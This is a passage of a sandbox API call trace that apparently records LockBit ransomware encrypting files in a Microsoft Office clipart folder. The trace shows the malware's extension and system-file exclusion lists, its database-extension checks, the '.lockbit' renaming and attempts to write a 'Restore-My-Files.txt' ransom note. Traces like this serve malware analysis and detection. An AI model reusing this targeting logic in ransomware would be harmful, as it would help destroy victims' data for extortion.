lpString2=".WMF") returned -1 [0146.115] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0146.115] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0146.115] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0146.115] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0146.115] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0146.115] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0146.115] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0146.115] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0146.115] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0146.115] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0146.115] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0146.115] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0146.115] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152876.WMF.lockbit") returned 72 [0146.115] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152876.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152876.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0146.120] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0146.121] malloc (_Size=0x40068) returned 0x1ff1e60 [0146.121] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=7876) returned 1 [0146.121] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.121] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.121] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0146.121] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.122] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.122] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0146.122] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0146.123] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152876.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152876.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0146.124] malloc (_Size=0xa6) returned 0x1fa2ed8 [0146.124] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0146.124] free (_Block=0x1fa2ed8) [0146.124] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152876.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0146.124] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0146.124] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0146.125] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65f73730, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x3a28, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0152878.WMF", cAlternateFileName="")) returned 1 [0146.125] lstrcmpiW (lpString1=".", lpString2="J0152878.WMF") returned -1 [0146.125] lstrcmpiW (lpString1="..", lpString2="J0152878.WMF") returned -1 [0146.125] PathFindExtensionW (pszPath="J0152878.WMF") returned=".WMF" [0146.125] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0146.125] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0146.125] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0146.125] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0146.125] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0146.125] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0146.125] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0146.125] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0146.125] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0146.125] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0146.125] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0146.125] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0146.125] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0146.125] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0146.125] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0146.125] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0146.125] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0146.125] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0146.125] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0146.125] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0146.125] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0146.126] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0146.126] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0146.126] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0146.126] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.126] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0146.126] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0146.126] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0146.126] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0146.126] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0146.126] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0146.126] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0146.126] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0146.126] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0146.126] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0146.126] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0146.126] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0146.126] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0146.126] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0146.126] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0146.126] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0146.126] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0146.126] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.126] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0146.126] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0146.126] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0146.126] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0146.126] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0152878.WMF") returned 1 [0146.127] lstrcmpiW (lpString1="ntldr", lpString2="J0152878.WMF") returned 1 [0146.127] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0152878.WMF") returned 1 [0146.127] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0152878.WMF") returned -1 [0146.127] lstrcmpiW (lpString1="autorun.inf", lpString2="J0152878.WMF") returned -1 [0146.127] lstrcmpiW (lpString1="thumbs.db", lpString2="J0152878.WMF") returned 1 [0146.127] lstrcmpiW (lpString1="iconcache.db", lpString2="J0152878.WMF") returned -1 [0146.127] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0146.127] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152878.WMF") returned=".WMF" [0146.127] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0146.127] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0146.127] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0146.127] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0146.127] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0146.127] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0146.127] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0146.127] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0146.127] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0146.127] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0146.127] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0146.127] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0146.127] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0146.127] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0146.127] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0146.127] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0146.127] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0146.127] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0146.128] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0146.128] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0146.128] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0146.128] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0146.128] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0146.128] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0146.128] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0146.128] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0146.128] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0146.128] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0146.128] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152878.WMF.lockbit") returned 72 [0146.128] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152878.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152878.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0146.129] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0146.129] malloc (_Size=0x40068) returned 0x3d70450 [0146.129] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=14888) returned 1 [0146.129] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.129] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.129] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0146.129] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.130] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.130] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0146.130] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0146.134] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152878.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152878.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0146.134] malloc (_Size=0xa6) returned 0x1fa2ed8 [0146.134] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0146.135] free (_Block=0x1fa2ed8) [0146.135] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152878.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0146.135] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0146.135] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0146.135] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65f73730, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2370, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0152882.WMF", cAlternateFileName="")) returned 1 [0146.135] lstrcmpiW (lpString1=".", lpString2="J0152882.WMF") returned -1 [0146.136] lstrcmpiW (lpString1="..", lpString2="J0152882.WMF") returned -1 [0146.136] PathFindExtensionW (pszPath="J0152882.WMF") returned=".WMF" [0146.136] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0146.136] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0146.136] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0146.136] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0146.136] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0146.136] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0146.136] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0146.136] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0146.136] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0146.136] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0146.136] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0146.136] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0146.136] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0146.136] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0146.136] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0146.136] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0146.136] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0146.136] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0146.137] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0146.137] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0146.137] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0146.137] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0146.137] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0146.137] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0146.137] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.137] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0146.137] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0146.137] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0146.137] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0146.137] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0146.137] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0146.137] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0146.137] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0146.137] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0146.137] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0146.137] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0146.137] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0146.137] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0146.138] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0146.138] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0146.138] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0146.138] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0146.138] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.138] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0146.138] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0146.138] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0146.138] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0146.138] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0152882.WMF") returned 1 [0146.138] lstrcmpiW (lpString1="ntldr", lpString2="J0152882.WMF") returned 1 [0146.138] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0152882.WMF") returned 1 [0146.138] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0152882.WMF") returned -1 [0146.138] lstrcmpiW (lpString1="autorun.inf", lpString2="J0152882.WMF") returned -1 [0146.138] lstrcmpiW (lpString1="thumbs.db", lpString2="J0152882.WMF") returned 1 [0146.138] lstrcmpiW (lpString1="iconcache.db", lpString2="J0152882.WMF") returned -1 [0146.138] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0146.138] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152882.WMF") returned=".WMF" [0146.138] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0146.139] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0146.139] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0146.139] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0146.139] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0146.139] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0146.139] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0146.139] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0146.139] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0146.139] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0146.139] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0146.139] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0146.139] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0146.139] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0146.139] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0146.139] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0146.139] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0146.139] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0146.140] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0146.140] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0146.140] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0146.140] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0146.140] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0146.140] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0146.140] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0146.140] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0146.140] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0146.140] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0146.140] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152882.WMF.lockbit") returned 72 [0146.140] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152882.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152882.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0146.141] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0146.141] malloc (_Size=0x40068) returned 0x3e70008 [0146.141] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=9072) returned 1 [0146.141] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.142] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.142] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0146.142] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.143] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.143] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0146.143] ReadFile (in: hFile=0x2a4, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0146.161] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152882.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152882.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0146.161] malloc (_Size=0xa6) returned 0x1fa2ed8 [0146.161] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0146.163] free (_Block=0x1fa2ed8) [0146.163] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152882.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0146.163] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0146.163] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0146.163] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65f73730, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1b2c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0152884.WMF", cAlternateFileName="")) returned 1 [0146.163] lstrcmpiW (lpString1=".", lpString2="J0152884.WMF") returned -1 [0146.163] lstrcmpiW (lpString1="..", lpString2="J0152884.WMF") returned -1 [0146.163] PathFindExtensionW (pszPath="J0152884.WMF") returned=".WMF" [0146.163] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0146.164] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0146.164] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0146.164] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0146.164] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0146.164] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0146.164] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0146.164] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0146.164] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0146.164] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0146.164] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0146.164] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0146.164] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0146.164] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0146.164] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0146.164] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0146.164] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0146.164] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0146.164] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0146.164] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0146.164] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0146.165] lstrcmpiW 